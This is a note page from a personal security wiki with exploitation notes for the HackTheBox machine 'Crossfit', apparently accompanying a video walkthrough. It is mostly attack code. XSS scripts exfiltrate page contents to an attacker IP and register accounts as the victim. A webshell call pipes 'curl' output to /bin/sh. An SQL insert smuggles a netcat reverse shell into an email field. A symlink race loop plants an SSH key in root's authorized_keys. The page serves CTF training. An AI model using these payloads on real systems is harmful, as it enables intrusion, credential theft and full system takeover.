xct's notes
Search…
Introduction
Red Team
Active Directory
Host Enum
Payloads
Passwords
Privilege Escalation
Evasion & Bypasses
Concepts & Research
Binary Exploitation
Web
Cloud
Mobile
Hardware
Crypto
Templates
Misc
Blue Team
Active Directory
Malware Analysis
SIEM
Misc
Labs
Keys & Signing
Language & Framwork Specifics
Misc
HackTheBox
Crossfit
Luanne
APT
Attended
Delivery
Cereal
Powered By GitBook
Crossfit
Notes for https://youtu.be/jSYRyhY9JuE

User

Payload.js (browse to page & retrieve contents)

1
xhr = new XMLHttpRequest();
2
​
3
xhr.onload = function() {
4
x = new XMLHttpRequest();
5
x.open("GET", 'http://10.10.14.10/?'+xhr.response);
6
x.send(null);
7
}
8
​
9
xhr.open("GET", 'http://ftp.crossfit.htb/accounts/create', false);
10
xhr.send(null);
Copied!

Register.js (send POST request as victim)

1
user = 'foo'
2
pass = 'foo'
3
​
4
xhr = new XMLHttpRequest;
5
xhr.withCredentials = true;
6
​
7
xhr.onload = function() {
8
x = new XMLHttpRequest();
9
x.open("GET", 'http://10.10.14.10/?'+xhr.response);
10
x.send(null);
11
}
12
xhr.open('GET', 'http://ftp.crossfit.htb/accounts/create', false);
13
xhr.send(null);
14
​
15
r = /token" value="(.*)"/g;
16
token = r.exec(xhr.responseText)[1];
17
​
18
var params = '_token=' + token + '&username=' + user + '&pass=' + pass
19
xhr.open('POST', "http://ftp.crossfit.htb/accounts", false);
20
xhr.setRequestHeader('Content-type', 'application/x-www-form-urlencoded');
21
xhr.send(params);
Copied!

Shell.js (execute webshell command via XSS)

1
xhr = new XMLHttpRequest();
2
​
3
xhr.onload = function() {
4
x = new XMLHttpRequest();
5
x.open("GET", 'http://10.10.14.10/?'+xhr.response);
6
x.send(null);
7
}
8
​
9
xhr.open("GET", 'http://development-test.crossfit.htb/xct.php?xcmd=curl 10.10.14.10/x|/bin/sh', false);
10
xhr.send(null);
Copied!

Root

Guess.c

1
int main (void){
2
srand(time (0));
3
printf("%d", rand());
4
return 0;
5
}
Copied!

Become ftpadm

1
su -s /bin/bash -c 'echo 123>/srv/ftp/messages/123' ftpadm
Copied!
1
insert into users (id,email) VALUES (0,'[email protected] --wrong-argument || nc.traditional 10.10.14.10 1337 -e /bin/sh');
Copied!

Race to Root (as hank)

1
while true; do ln -s /root/.ssh/authorized_keys /var/local/$(echo -ne $(./guess)1000 | md5sum | awk '{ print $1 }') 2>/dev/null; done
Copied!
1
insert into messages (id, name, email, message) VALUES (1000, 'ssh-ed25519', '[email protected]', 'AAAAC3NzaC1lZDI1NTE5AAAAINvEpPGmpbIYTXl69lGbFlPa137agV6rvHGq5PgU5vsF');
Copied!
Misc - Previous
Misc
Next - HackTheBox
Luanne
Last modified 1yr ago
Copy link
Contents
User
Payload.js (browse to page & retrieve contents)
Register.js (send POST request as victim)
Shell.js (execute webshell command via XSS)
Root
Guess.c
Become ftpadm
Race to Root (as hank)